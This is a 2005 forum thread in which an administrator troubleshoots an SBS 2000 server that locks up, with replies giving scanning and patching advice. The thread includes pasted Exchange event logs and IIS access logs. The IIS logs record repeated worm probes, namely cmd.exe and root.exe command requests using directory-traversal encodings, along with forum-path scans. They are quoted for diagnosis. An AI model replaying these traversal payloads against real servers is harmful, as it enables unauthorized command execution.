The system can not log you on due to the following error. The network request is not supported.

Discussion in 'Virus Information' started by Fredly, Jun 4, 2005.

  1. Fredly

    Fredly Guest

    The system can not log you on due to the following error. The network
    request is not supported.

    Seems to be a rash of this problem in the last few days. Several people
    reference a virus, worm or bot.

    http://www.experts-exchange.co­m/Operating_Systems/Win2000/Q_­21439641....

    http://www.experts-exchange.co­m/Operating_Systems/Win2000/Q_­21443828....

    I'm having trouble with exchange errors and then the system itself. I too,
    ran into this one time a few weeks ago, then nothing until 6/1. Now it's
    every few hours, hard boot, happens again.

    We run SAVCE 8.0 and it's defs are up to date.

    I going in to fight with this today. Anybody here anything new? I saw
    someone already called MS. Any luck??
     
    Fredly, Jun 4, 2005
    #1
    1. Advertisements

  2. From: "Fredly" <>

    | The system can not log you on due to the following error. The network
    | request is not supported.
    |
    | Seems to be a rash of this problem in the last few days. Several people
    | reference a virus, worm or bot.
    |
    | http://www.experts-exchange.co­m/Operating_Systems/Win2000/Q_­21439641....
    |
    | http://www.experts-exchange.co­m/Operating_Systems/Win2000/Q_­21443828....
    |
    | I'm having trouble with exchange errors and then the system itself. I too,
    | ran into this one time a few weeks ago, then nothing until 6/1. Now it's
    | every few hours, hard boot, happens again.
    |
    | We run SAVCE 8.0 and it's defs are up to date.
    |
    | I going in to fight with this today. Anybody here anything new? I saw
    | someone already called MS. Any luck??
    |

    You posted all over the place and haven't supplied any substantiating information.
     
    David H. Lipman, Jun 4, 2005
    #2
    1. Advertisements

  3. SAV 8.0 is not compatible with SBS. You need to upgrade to 10.0
     
    Frank McCallister SBS MVP, Jun 4, 2005
    #3
  4. Fredly

    Fredly Guest

    Thanks Dave and Frank.

    Frank, SAVCE is compatible with SBS 2000. I'm not very impressed by 10 at
    this time. I'd stick with 9 until they iron it out...

    Dave, I'm looking for someone who is having this problem and has had some
    luck with it. Thank you for your response.

    "You posted all over the place and haven't supplied any substantiating
    information."

    Anything in particular you were looking for?

    SBS 2000
    SAVCE 8.0
    Watchguard

    Here is my post from yesterday.

    -----------------

    I've got an SBS 2000 server that keeps locking up. Users cannot use Outlook
    or shared folders.

    When you try and logon at the server locally (on the console) you get:

    "The system can not log you on due to the following error.

    The network request is not supported.

    Please try again or ..."

    We must hold in the power button and hard boot. Then it works for a while.
    Less and less time it seems.

    In the time I can get in after reboots this is what I'm seeing in the event
    log (app) prior to lock up. In no certain order:

    Event Type: Error
    Event Source: MSExchangeMTA
    Event Category: Directory Access
    Event ID: 155
    Date: 6/3/2005
    Time: 7:05:09 AM
    User: N/A
    Computer: x
    Description:
    Error 0X80004005 occurred while reading information for directory name (DN)
    CN=SMTP
    (x-{D968AE78-98D6-45FE-AE89-EB1F92726DBA}),CN=CONNECTIONS,CN=x,CN=MICROSOFT
    EXCHANGE,CN=SERVICES,CN=CONFIGURATION,DC=x,DC=LOCAL from the directory. [MTA
    OPERATOR 25 38] (12)

    For more information, click http://www.microsoft.com/contentredirect.asp.


    Event Type: Error
    Event Source: MSExchangeIS Public Store
    Event Category: Replication Errors
    Event ID: 3079
    Date: 6/3/2005
    Time: 6:50:46 AM
    User: N/A
    Computer: x
    Description:
    Unexpected replication thread error 0x80004005 on database "First Storage
    Group\Public Folder Store (x)"

    FReplAgent


    For more information, click http://www.microsoft.com/contentredirect.asp.


    Event Type: Warning
    Event Source: MSExchangeMU
    Event Category: General
    Event ID: 1040
    Date: 6/3/2005
    Time: 6:24:04 AM
    User: N/A
    Computer: x
    Description:
    Metabase Update failed replication 5 times with error 80004005 (Unspecified
    error). Please change the diagnostic logging level of MSExchangeMU to
    'minimum' or greater to find the source of the problem.

    For more information, click http://www.microsoft.com/contentredirect.asp.


    Event Type: Error
    Event Source: MSExchangeSA
    Event Category: General
    Event ID: 9188
    Date: 6/3/2005
    Time: 6:17:37 AM
    User: N/A
    Computer: x
    Description:
    Microsoft Exchange System Attendant failed to read the membership of group
    'cn=Exchange Domain Servers,cn=Users,dc=x,dc=local'. Error code '8007203b'.

    Please check whether the local computer is a member of the group. If it is
    not, stop all the Microsoft Exchange services, add the local computer into
    the group manually and restart all the services.

    For more information, click http://www.microsoft.com/contentredirect.asp.


    Event Type: Error
    Event Source: Userenv
    Event Category: None
    Event ID: 1000
    Date: 6/3/2005
    Time: 6:07:04 AM
    User: NT AUTHORITY\SYSTEM
    Computer: x
    Description:
    Windows cannot determine the user or computer name. Return value (1747).


    Event Type: Error
    Event Source: MSExchangeIS Public Store
    Event Category: General
    Event ID: 7200
    Date: 6/3/2005
    Time: 6:03:00 AM
    User: N/A
    Computer: x
    Description:
    Background thread FDoUpdateCatalog halted on database "First Storage
    Group\Public Folder Store (x)" due to error code 0x80004005.

    For more information, click http://www.microsoft.com/contentredirect.asp.


    Event Type: Error
    Event Source: MSExchangeDSAccess
    Event Category: Topology
    Event ID: 2103
    Date: 6/3/2005
    Time: 6:03:04 AM
    User: N/A
    Computer: x
    Description:
    Process MAD.EXE (PID=2748). All Global Catalog Servers in use are not
    responding:
    x.x.local


    For more information, click http://www.microsoft.com/contentredirect.asp.


    Event Type: Error
    Event Source: MSExchangeSA
    Event Category: General
    Event ID: 9153
    Date: 6/3/2005
    Time: 8:33:37 AM
    User: N/A
    Computer: x
    Description:
    Microsoft Exchange System Attendant reported an error '0x8007203b' when
    setting DS notification.

    For more information, click http://www.microsoft.com/contentredirect.asp.

    Event Type: Error
    Event Source: MSExchangeSA
    Event Category: RFR Interface
    Event ID: 9143
    Date: 6/3/2005
    Time: 8:35:19 AM
    User: N/A
    Computer: x
    Description:
    Referral Interface cannot contact any Global Catalog that supports the NSPI
    Service. Clients making RFR requests will fail to connect until a Global
    Catalog becomes available again. After a Domain Controller is promoted to a
    Global Catalog, it must be rebooted to support MAPI Clients.

    For more information, click http://www.microsoft.com/contentredirect.asp.

    Event Type: Error
    Event Source: MSExchangeDSAccess
    Event Category: Topology
    Event ID: 2102
    Date: 6/3/2005
    Time: 8:00:34 AM
    User: N/A
    Computer: x
    Description:
    Process MAD.EXE (PID=2748). All Domain Controller Servers in use are not
    responding:
    x.x.local


    For more information, click http://www.microsoft.com/contentredirect.asp.
     
    Fredly, Jun 4, 2005
    #4
  5. From: "Fredly" <>

    | Thanks Dave and Frank.
    |
    | Frank, SAVCE is compatible with SBS 2000. I'm not very impressed by 10 at
    | this time. I'd stick with 9 until they iron it out...
    |
    | Dave, I'm looking for someone who is having this problem and has had some
    | luck with it. Thank you for your response.
    |
    | "You posted all over the place and haven't supplied any substantiating
    | information."
    |
    | Anything in particular you were looking for?
    |
    | SBS 2000
    | SAVCE 8.0
    | Watchguard
    |
    | Here is my post from yesterday.

    < event log entries snipped >

    I pcked you up in the MS Security/Virus NG. The URLs posted are brokend and and don't see
    viral activity from anything posted thus far.
     
    David H. Lipman, Jun 4, 2005
    #5
  6. Fredly

    Fredly Guest

    Just ran another scan and she came up clean.

    Last night, after running OK for 5+hrs, it came up these two in the app log
    first. Then went on to it's slew of Exchange / GC errors. Same as the last
    post.

    Event Type: Error
    Event Source: Userenv
    Event Category: None
    Event ID: 1000
    Date: 6/3/2005
    Time: 7:33:11 PM
    User: NT AUTHORITY\SYSTEM
    Computer:x
    Description:
    Windows cannot establish a connection to x.local with (1364).

    Event Type: Error
    Event Source: Userenv
    Event Category: None
    Event ID: 1000
    Date: 6/3/2005
    Time: 7:33:11 PM
    User: NT AUTHORITY\SYSTEM
    Computer: x
    Description:
    Windows cannot query for the list of Group Policy objects . A message that
    describes the reason for this was previously logged by this policy engine.
     
    Fredly, Jun 4, 2005
    #6
  7. Sorry you posted in SBS 2k3 group I assumed 2k3 not 2000. Yes 9 is
    compatible, 10 is latest.

    --
    Frank McCallister SBS MVP
    COMPUMAC
     
    Frank McCallister SBS MVP, Jun 4, 2005
    #7
  8. Fredly

    Fredly Guest

    David-

    Sorry for the broken links! This link thread says it all. Towards the end
    there are two additional links that really nail it.

    http://groups-beta.google.com/group/microsoft.public.win2000.networking/browse_thread/thread/27b69c439da224e2/803ce711ac10a3e0?q=%22the+system+can+not+log+you+on+due+to+the+following+error%22&rnum=3&hl=en#803ce711ac10a3e0

    If that doesn't work try copying and pasting the line below into a google
    groups search. This is the subject (not my post). It should come up 5th...

    The network request is not supported - Help needed !!!

    Thank you!
     
    Fredly, Jun 4, 2005
    #8
  9. From: "Fredly" <>

    Run a scan using the McAfee Command Line Scanner to see if there is anthing SAV missed.

    You can run it in Normal Mode if you like if you don't want to bring down the server.


    Dump the contents of the IE Temporary Internet Folder cache (TIF)
    Start --> Settings --> Control Panel --> Internet Options --> Delete Files

    Dump the contents of the Mozilla FireFox Cache { if you use FireFox }
    Tools --> Options --> Privacy --> Cache --> Clear


    Download CLEAN.EXE from the URL --
    http://www.ik-cs.com/programs/virtools/clean.exe

    It is a self-extracting ZIP file that contains the Kixtart Script Interpreter
    { http://kixtart.org Kixtart is CareWare } three batch files, two Kixtart scripts, two Link
    (.lnk) files and a PDF instruction file.

    GETFILES.BAT -- For downloading (FTP) the files needed to run the McAfee Command Line
    Scanner. You may have to disable your FireWall or allow FTP.EXE to go through your FireWall
    to allow the FTP utility to download the needed files

    CLEAN.BAT -- For running within Windows after running c:\mcafee\GetFiles.BAT. If you choose
    to scan again at a future date, run this batch file. It will automatically check the date
    of the McAfee DAT files and if it is a couple of days old, it will download (FTP) the latest
    signature files and install them before performing the scan.

    DOSCLEAN.BAT -- For use on a Win9x/ME PC or on a Win2K/WinXP PC that is using FAT32 after
    you have booted from an Emergency Boot Disk or DOS disk and have already executed;
    c:\mcafee\GetFiles.BAT from within Windows. DOS disk boot images can be obtained from;
    http://www.bootdisk.com/bootdisk.htm

    I need you to perform the following...

    Execute; CLEAN.EXE
    Choose; Unzip
    Choose; Close

    Execute; c:\mcafee\GetFiles.BAT
    { or Double-click on 'GetFiles Link' in c:\mcafee }

    Reboot the PC into Safe Mode [F8 key during boot]

    Shutdown as many applications as possible !
    It would also help for you to read - "How to perform a clean boot in Windows XP"
    http://support.microsoft.com/kb/310353

    Execute; c:\mcafee\CLEAN.BAT
    { or Double-click on 'Clean Link' in c:\mcafee }

    A final report in HTML format called C:\mcafee\ScanReport.HTML will be generated. At the
    end of the scan, it will be displayed in your browser (Opera, FireFox or Internet Explorer).
    It is suggested that you move the report out of c:\mcafee before performing another scan.
    It would be a good idea to scan in Safe Mode and in Normal Mode and save a copy of the HTML
    report for each session.


    * * * Please report back your results * * *
     
    David H. Lipman, Jun 4, 2005
    #9
  10. Fredly

    Fredly Guest

    Frank. You're right. My fault. Oops. I'm so used to posting to this SBS
    group, I forgot it was a 2K3 group. I should have been specific. Duh.

     
    Fredly, Jun 4, 2005
    #10
  11. As a safety precaution can you put the internal nic on a hub by itself (or
    at least shutdown all internal client machines/servers) and unplug the
    external network cable and then reboot the server.. Does the
    problem occur? If not, then can you configure the server (ISA/firewall) to
    not allow any inbound traffic to the server (for example, disable inbound
    packet filters, web publishing rules, and/or server publishing rules).. Then
    plug in the external network cable and go to Windows Update and check to
    see if you are missing any critical updates! And/or any other critical
    updates. Might use something like MBSA to check the server as well.


    --

    Hope that helps,
    David Copeland
    Microsoft Small Business Server Support

    This posting is provided "AS IS" with no warranties, and confers no rights.


    SBS Newsgroups:

    SBS v4.x: microsoft.public.backoffice.smallbiz
    SBS 2000: microsoft.public.backoffice.smallbiz2000
    SBS 2003: microsoft.public.windows.server.sbs

     
    David Copeland [MSFT], Jun 4, 2005
    #11
  12. Fredly

    Fredly Guest

    Thank you David!

    It takes a while for it to occur so I won't know soon. I did close port 80
    on the watchguard firewall (it was pointing to the server). Just a hunch.
    I was back a few patches.

    I have red stop sign errors on Array Manager, Public, Exchange and Exadmin
    in IIS.

    I just saw this in my IIS log:

    2005-06-04 00:29:37 67.183.3.221 - 10.0.0.2 80 GET / - 500 -
    2005-06-04 05:41:28 67.116.70.34 - 10.0.0.2 80 GET /scripts/root.exe /c+dir
    404 -
    2005-06-04 05:41:28 67.116.70.34 - 10.0.0.2 80 GET /MSADC/root.exe /c+dir
    403 -
    2005-06-04 05:41:30 67.116.70.34 - 10.0.0.2 80 GET /c/winnt/system32/cmd.exe
    /c+dir 404 -
    2005-06-04 05:41:30 67.116.70.34 - 10.0.0.2 80 GET /d/winnt/system32/cmd.exe
    /c+dir 404 -
    2005-06-04 05:41:32 67.116.70.34 - 10.0.0.2 80 GET
    /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
    2005-06-04 05:41:32 67.116.70.34 - 10.0.0.2 80 GET
    /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 500 -
    2005-06-04 05:41:34 67.116.70.34 - 10.0.0.2 80 GET
    /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
    2005-06-04 05:41:35 67.116.70.34 - 10.0.0.2 80 GET
    /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe
    /c+dir 403 -
    2005-06-04 05:41:35 67.116.70.34 - 10.0.0.2 80 GET
    /scripts/..Á../winnt/system32/cmd.exe /c+dir 500 -
    2005-06-04 05:41:37 67.116.70.34 - 10.0.0.2 80 GET
    /scripts/winnt/system32/cmd.exe /c+dir 404 -
    2005-06-04 05:41:37 67.116.70.34 - 10.0.0.2 80 GET /winnt/system32/cmd.exe
    /c+dir 404 -
    2005-06-04 05:41:39 67.116.70.34 - 10.0.0.2 80 GET /winnt/system32/cmd.exe
    /c+dir 404 -
    2005-06-04 05:41:39 67.116.70.34 - 10.0.0.2 80 GET
    /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
    2005-06-04 05:41:41 67.116.70.34 - 10.0.0.2 80 GET
    /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
    2005-06-04 05:41:42 67.116.70.34 - 10.0.0.2 80 GET
    /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
    2005-06-04 05:41:42 67.116.70.34 - 10.0.0.2 80 GET
    /scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 -
    2005-06-04 06:14:05 67.167.141.247 - 10.0.0.2 80 GET / - 500 -

    This from the other day:

    2005-06-01 16:25:54 61.73.62.50 - 10.0.0.2 80 GET /forum/ - 404
    Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0;+.NET+CLR+1.0.3705)
    2005-06-01 16:25:55 61.73.62.50 - 10.0.0.2 80 GET /phpBB/ - 404
    Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0;+.NET+CLR+1.0.3705)
    2005-06-01 16:25:57 61.73.62.50 - 10.0.0.2 80 GET /iisstart.asp - 200
    Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0;+.NET+CLR+1.0.3705)
    2005-06-01 16:25:57 61.73.62.50 - 10.0.0.2 80 GET /forums/ - 404
    Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0;+.NET+CLR+1.0.3705)
    2005-06-01 16:25:59 61.73.62.50 - 10.0.0.2 80 GET /phpbb/ - 404
    Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0;+.NET+CLR+1.0.3705)
    2005-06-01 16:26:01 61.73.62.50 - 10.0.0.2 80 GET /board/ - 404
    Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0;+.NET+CLR+1.0.3705)
    2005-06-01 16:26:02 61.73.62.50 - 10.0.0.2 80 GET /boards/ - 404
    Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0;+.NET+CLR+1.0.3705)
    2005-06-01 16:26:04 61.73.62.50 - 10.0.0.2 80 GET /phpBB2/ - 404
    Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0;+.NET+CLR+1.0.3705)
    2005-06-01 16:26:05 61.73.62.50 - 10.0.0.2 80 GET /msgboard/ - 404
    Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0;+.NET+CLR+1.0.3705)
    2005-06-01 16:26:07 61.73.62.50 - 10.0.0.2 80 GET /foros/ - 404
    Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0;+.NET+CLR+1.0.3705)
    2005-06-01 16:26:08 61.73.62.50 - 10.0.0.2 80 GET /portal/ - 404
    Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0;+.NET+CLR+1.0.3705)

    This from the first time the server behaved this way:

    2005-05-09 03:27:26 67.163.230.186 - 10.0.0.2 80 GET /scripts/root.exe
    /c+dir 404 -
    2005-05-09 03:27:26 67.163.230.186 - 10.0.0.2 80 GET /MSADC/root.exe /c+dir
    403 -
    2005-05-09 03:27:26 67.163.230.186 - 10.0.0.2 80 GET
    /c/winnt/system32/cmd.exe /c+dir 404 -
    2005-05-09 03:27:26 67.163.230.186 - 10.0.0.2 80 GET
    /d/winnt/system32/cmd.exe /c+dir 404 -
    2005-05-09 03:27:27 67.163.230.186 - 10.0.0.2 80 GET
    /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
    2005-05-09 03:27:27 67.163.230.186 - 10.0.0.2 80 GET
    /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 500 -
    2005-05-09 03:27:27 67.163.230.186 - 10.0.0.2 80 GET
    /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
    2005-05-09 03:27:27 67.163.230.186 - 10.0.0.2 80 GET
    /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe
    /c+dir 403 -
    2005-05-09 03:27:28 67.163.230.186 - 10.0.0.2 80 GET
    /scripts/..Á../winnt/system32/cmd.exe /c+dir 500 -
    2005-05-09 03:27:28 67.163.230.186 - 10.0.0.2 80 GET
    /scripts/winnt/system32/cmd.exe /c+dir 404 -
    2005-05-09 03:27:28 67.163.230.186 - 10.0.0.2 80 GET /winnt/system32/cmd.exe
    /c+dir 404 -
    2005-05-09 03:27:28 67.163.230.186 - 10.0.0.2 80 GET /winnt/system32/cmd.exe
    /c+dir 404 -
    2005-05-09 03:27:29 67.163.230.186 - 10.0.0.2 80 GET
    /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
    2005-05-09 03:27:29 67.163.230.186 - 10.0.0.2 80 GET
    /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
    2005-05-09 03:27:29 67.163.230.186 - 10.0.0.2 80 GET
    /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
    2005-05-09 03:27:29 67.163.230.186 - 10.0.0.2 80 GET
    /scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 -
    2005-05-09 11:26:56 218.83.155.79 - 10.0.0.2 80 GET /iisstart.asp - 500 -
    2005-05-09 14:10:16 10.0.0.2 - 10.0.0.2 80 OPTIONS / - 200
    Microsoft-WebDAV-MiniRedir/5.1.2600
    2005-05-09 14:14:39 10.0.0.2 - 10.0.0.2 80 PROPFIND /sysvol - 404
    Microsoft-WebDAV-MiniRedir/5.1.26002005-05-09 03:27:26 67.163.230.186 -
    10.0.0.2 80 GET /scripts/root.exe /c+dir 404 -
    2005-05-09 03:27:26 67.163.230.186 - 10.0.0.2 80 GET /MSADC/root.exe /c+dir
    403 -
    2005-05-09 03:27:26 67.163.230.186 - 10.0.0.2 80 GET
    /c/winnt/system32/cmd.exe /c+dir 404 -
    2005-05-09 03:27:26 67.163.230.186 - 10.0.0.2 80 GET
    /d/winnt/system32/cmd.exe /c+dir 404 -
    2005-05-09 03:27:27 67.163.230.186 - 10.0.0.2 80 GET
    /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
    2005-05-09 03:27:27 67.163.230.186 - 10.0.0.2 80 GET
    /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 500 -
    2005-05-09 03:27:27 67.163.230.186 - 10.0.0.2 80 GET
    /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
    2005-05-09 03:27:27 67.163.230.186 - 10.0.0.2 80 GET
    /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe
    /c+dir 403 -
    2005-05-09 03:27:28 67.163.230.186 - 10.0.0.2 80 GET
    /scripts/..Á../winnt/system32/cmd.exe /c+dir 500 -
    2005-05-09 03:27:28 67.163.230.186 - 10.0.0.2 80 GET
    /scripts/winnt/system32/cmd.exe /c+dir 404 -
    2005-05-09 03:27:28 67.163.230.186 - 10.0.0.2 80 GET /winnt/system32/cmd.exe
    /c+dir 404 -
    2005-05-09 03:27:28 67.163.230.186 - 10.0.0.2 80 GET /winnt/system32/cmd.exe
    /c+dir 404 -
    2005-05-09 03:27:29 67.163.230.186 - 10.0.0.2 80 GET
    /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
    2005-05-09 03:27:29 67.163.230.186 - 10.0.0.2 80 GET
    /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
    2005-05-09 03:27:29 67.163.230.186 - 10.0.0.2 80 GET
    /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
    2005-05-09 03:27:29 67.163.230.186 - 10.0.0.2 80 GET
    /scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 -
    2005-05-09 11:26:56 218.83.155.79 - 10.0.0.2 80 GET /iisstart.asp - 500 -
    2005-05-09 14:10:16 10.0.0.2 - 10.0.0.2 80 OPTIONS / - 200
    Microsoft-WebDAV-MiniRedir/5.1.2600
    2005-05-09 14:14:39 10.0.0.2 - 10.0.0.2 80 PROPFIND /sysvol - 404
    Microsoft-WebDAV-MiniRedir/5.1.2600


     
    Fredly, Jun 4, 2005
    #12
  13. Fredly

    Fredly Guest

    More IIS logs

    2005-05-15 10:20:09 67.181.18.143 - 10.0.0.2 80 GET /scripts/root.exe /c+dir
    404 -
    2005-05-15 10:20:09 67.181.18.143 - 10.0.0.2 80 GET /MSADC/root.exe /c+dir
    403 -
    2005-05-15 10:20:10 67.181.18.143 - 10.0.0.2 80 GET
    /c/winnt/system32/cmd.exe /c+dir 404 -
    2005-05-15 10:20:10 67.181.18.143 - 10.0.0.2 80 GET
    /d/winnt/system32/cmd.exe /c+dir 404 -
    2005-05-15 10:20:11 67.181.18.143 - 10.0.0.2 80 GET
    /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
    2005-05-15 10:20:11 67.181.18.143 - 10.0.0.2 80 GET
    /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 500 -
    2005-05-15 10:20:11 67.181.18.143 - 10.0.0.2 80 GET
    /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
    2005-05-15 10:20:12 67.181.18.143 - 10.0.0.2 80 GET
    /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe
    /c+dir 403 -
    2005-05-15 10:20:12 67.181.18.143 - 10.0.0.2 80 GET
    /scripts/..Á../winnt/system32/cmd.exe /c+dir 500 -
    2005-05-15 10:20:13 67.181.18.143 - 10.0.0.2 80 GET
    /scripts/winnt/system32/cmd.exe /c+dir 404 -
    2005-05-15 10:20:13 67.181.18.143 - 10.0.0.2 80 GET /winnt/system32/cmd.exe
    /c+dir 404 -
    2005-05-15 10:20:15 67.181.18.143 - 10.0.0.2 80 GET /winnt/system32/cmd.exe
    /c+dir 404 -
    2005-05-15 10:20:15 67.181.18.143 - 10.0.0.2 80 GET
    /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
    2005-05-15 10:20:15 67.181.18.143 - 10.0.0.2 80 GET
    /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
    2005-05-15 10:20:16 67.181.18.143 - 10.0.0.2 80 GET
    /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
    2005-05-15 10:20:16 67.181.18.143 - 10.0.0.2 80 GET
    /scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 -
    2005-05-15 11:47:46 67.188.237.215 - 10.0.0.2 80 GET /scripts/root.exe
    /c+dir 404 -
    2005-05-15 11:47:46 67.188.237.215 - 10.0.0.2 80 GET /MSADC/root.exe /c+dir
    403 -
    2005-05-15 11:47:46 67.188.237.215 - 10.0.0.2 80 GET
    /c/winnt/system32/cmd.exe /c+dir 404 -
    2005-05-15 11:47:46 67.188.237.215 - 10.0.0.2 80 GET
    /d/winnt/system32/cmd.exe /c+dir 404 -
    2005-05-15 11:47:47 67.188.237.215 - 10.0.0.2 80 GET
    /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
    2005-05-15 11:47:47 67.188.237.215 - 10.0.0.2 80 GET
    /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 500 -
    2005-05-15 11:47:47 67.188.237.215 - 10.0.0.2 80 GET
    /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
    2005-05-15 11:47:47 67.188.237.215 - 10.0.0.2 80 GET
    /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe
    /c+dir 403 -
    2005-05-15 11:47:48 67.188.237.215 - 10.0.0.2 80 GET
    /scripts/..Á../winnt/system32/cmd.exe /c+dir 500 -
    2005-05-15 11:47:48 67.188.237.215 - 10.0.0.2 80 GET
    /scripts/winnt/system32/cmd.exe /c+dir 404 -
    2005-05-15 11:47:48 67.188.237.215 - 10.0.0.2 80 GET /winnt/system32/cmd.exe
    /c+dir 404 -
    2005-05-15 11:47:48 67.188.237.215 - 10.0.0.2 80 GET /winnt/system32/cmd.exe
    /c+dir 404 -
    2005-05-15 11:47:49 67.188.237.215 - 10.0.0.2 80 GET
    /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
    2005-05-15 11:47:49 67.188.237.215 - 10.0.0.2 80 GET
    /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
    2005-05-15 11:47:49 67.188.237.215 - 10.0.0.2 80 GET
    /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
    2005-05-15 11:47:49 67.188.237.215 - 10.0.0.2 80 GET
    /scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 -
    2005-05-15 13:43:51 218.83.155.79 - 10.0.0.2 80 GET /default.shtml
    <B>Failed+to+process+SSI+file+'/default.shtml'</B><BR>++ 200 -

    2005-05-23 03:11:29 67.174.115.120 - 10.0.0.2 80 GET /scripts/root.exe
    /c+dir 404 -
    2005-05-23 03:11:29 67.174.115.120 - 10.0.0.2 80 GET /MSADC/root.exe /c+dir
    403 -
    2005-05-23 03:11:31 67.174.115.120 - 10.0.0.2 80 GET
    /c/winnt/system32/cmd.exe /c+dir 404 -
    2005-05-23 03:11:31 67.174.115.120 - 10.0.0.2 80 GET
    /d/winnt/system32/cmd.exe /c+dir 404 -
    2005-05-23 03:11:32 67.174.115.120 - 10.0.0.2 80 GET
    /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
    2005-05-23 03:11:32 67.174.115.120 - 10.0.0.2 80 GET
    /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 500 -
    2005-05-23 03:11:32 67.174.115.120 - 10.0.0.2 80 GET
    /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
    2005-05-23 03:11:33 67.174.115.120 - 10.0.0.2 80 GET
    /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe
    /c+dir 403 -
    2005-05-23 03:11:33 67.174.115.120 - 10.0.0.2 80 GET
    /scripts/..Á../winnt/system32/cmd.exe /c+dir 500 -
    2005-05-23 03:11:33 67.174.115.120 - 10.0.0.2 80 GET
    /scripts/winnt/system32/cmd.exe /c+dir 404 -
    2005-05-23 03:11:34 67.174.115.120 - 10.0.0.2 80 GET /winnt/system32/cmd.exe
    /c+dir 404 -
    2005-05-23 03:11:34 67.174.115.120 - 10.0.0.2 80 GET /winnt/system32/cmd.exe
    /c+dir 404 -
    2005-05-23 03:11:35 67.174.115.120 - 10.0.0.2 80 GET
    /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
    2005-05-23 03:11:35 67.174.115.120 - 10.0.0.2 80 GET
    /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
    2005-05-23 03:11:35 67.174.115.120 - 10.0.0.2 80 GET
    /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
    2005-05-23 03:11:35 67.174.115.120 - 10.0.0.2 80 GET
    /scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 -
    2005-05-23 06:56:33 201.7.175.11 - 10.0.0.2 80 GET /forum/ - 404
    Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0;+.NET+CLR+1.0.3705)
    2005-05-23 06:56:33 201.7.175.11 - 10.0.0.2 80 GET /phpBB/ - 404
    Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0;+.NET+CLR+1.0.3705)
    2005-05-23 06:56:38 201.7.175.11 - 10.0.0.2 80 GET /iisstart.asp - 200
    Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0;+.NET+CLR+1.0.3705)
    2005-05-23 06:56:38 201.7.175.11 - 10.0.0.2 80 GET /forums/ - 404
    Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0;+.NET+CLR+1.0.3705)
    2005-05-23 06:56:40 201.7.175.11 - 10.0.0.2 80 GET /phpbb/ - 404
    Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0;+.NET+CLR+1.0.3705)
    2005-05-23 06:56:40 201.7.175.11 - 10.0.0.2 80 GET /board/ - 404
    Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0;+.NET+CLR+1.0.3705)
